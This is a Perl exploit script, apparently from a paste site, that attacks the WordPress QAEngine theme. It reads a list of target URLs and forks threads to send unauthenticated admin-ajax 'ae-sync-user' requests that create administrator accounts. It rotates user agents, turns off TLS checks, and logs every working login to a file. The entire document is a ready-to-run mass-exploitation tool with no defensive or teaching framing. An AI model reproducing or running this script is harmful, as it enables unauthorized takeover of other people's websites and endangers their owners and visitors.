QAEngine Theme RCE + Fork

1. #!/usr/bin/perl
2. # install parallel::forkmanager module sudo apt-get install libparallel-forkmanager-perl
3. # or cpan Parallel::ForkManager
4. # @version 1.0
5. # @author M-A
6. # @link https://raw.githubusercontent.com/mranarshit/wp-Up_exp/master/qaengine.pl
7. # Perl Lov3r :)
8. use LWP::UserAgent;
9. use Getopt::Long;
10. use Parallel::ForkManager;
11.  
12.  
13. my $datestring = localtime();
14. my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime();
15. our($list,$wordlist,$thread);
16. sub randomagent {
17. my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
18. 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
19. 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
20. 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
21. 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
22. 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
23. );
24. my $random = $array[rand @array];
25. return($random);
26. }
27.  
28. GetOptions(
29. 'url|u=s' => \$list,
30. 'wordlist|w=s' => \$log,
31. 'threads|t=i' => \$thread,
32. ) || &flag();
33.  
34. if(!defined($list) || !defined($log) || !defined($thread) ){
35. &flag();
36. }
37.  
38. print "[+] Started : $datestring\n";
39.  
40. open(my $arq,'<'.$list) || die($!);
41. my @site = <$arq>;
42. @site = grep { !/^$/ } @site;
43. close($arq);
44. print "[".($#site+1)."] URL to test upload\n\n";
45.  
46. my $pm = new Parallel::ForkManager($thread);# preparing fork
47. foreach my $web (@site){#loop => working
48. my $pid = $pm->start and next;
49. chomp($web);
50. if($web !~ /^(http|https):\/\//){
51. $web = 'http://'.$web;
52. }
53. my $user = Generate_user();
54. my $pass = Generate_user();
55. expadd($web,$user,$pass);
56. $pm->finish;
57. }
58. $pm->wait_all_children();
59.  
60. sub expadd{
61. my ($url,$user,$pass) = @_;
62. my $useragent = randomagent();#Get a Random User Agent
63. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });#Https websites accept
64. $ua->timeout(10);
65. $ua->agent($useragent);
66. my $path = "/wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=".$user."&user_pass=". $pass ."&role=administrator";
67. my $target = $url.$path;
68. my $response = $ua->get($target);
69. if ($response->content=~/success\":true/){
70. print "\n[*] $url \n";
71. print "[OK] New Admin Successfuly Created \n";
72. print "| User : $user \n";
73. print "| Pass : $pass \n";
74. save ($log,"$url : ($user:$pass)");
75. }
76. else {print "\n[*] $url \n";print "[+] Error Creating New User \n";}
77.  
78. }
79. sub flag {
80. print "\n[+] WP QAEngine Theme R3m0t3 C0d3 Ex3cut10n (Add WP Admin) Exploiter \n[*] Coder => M-A\n";
81. print "[+] Usage :\n";
82. print "\t-u | urllist (List of websites)\n";
83. print "\t-w | logfile (Log file to save ressults)\n";
84. print "\t-t | threads (Number of Thread)\n\n";
85. }
86. sub Generate_user {
87. my $rndstr = rndstr(6, 1..9, 'a'..'z');
88. sub rndstr{ join'', @_[ map{ rand @_ } 1 .. shift ] }
89. }
90. sub save {
91. my ($file,$item) = @_;
92. open(SAVE,">>".$file);
93. print SAVE $item."\n";
94. close(SAVE);
95. }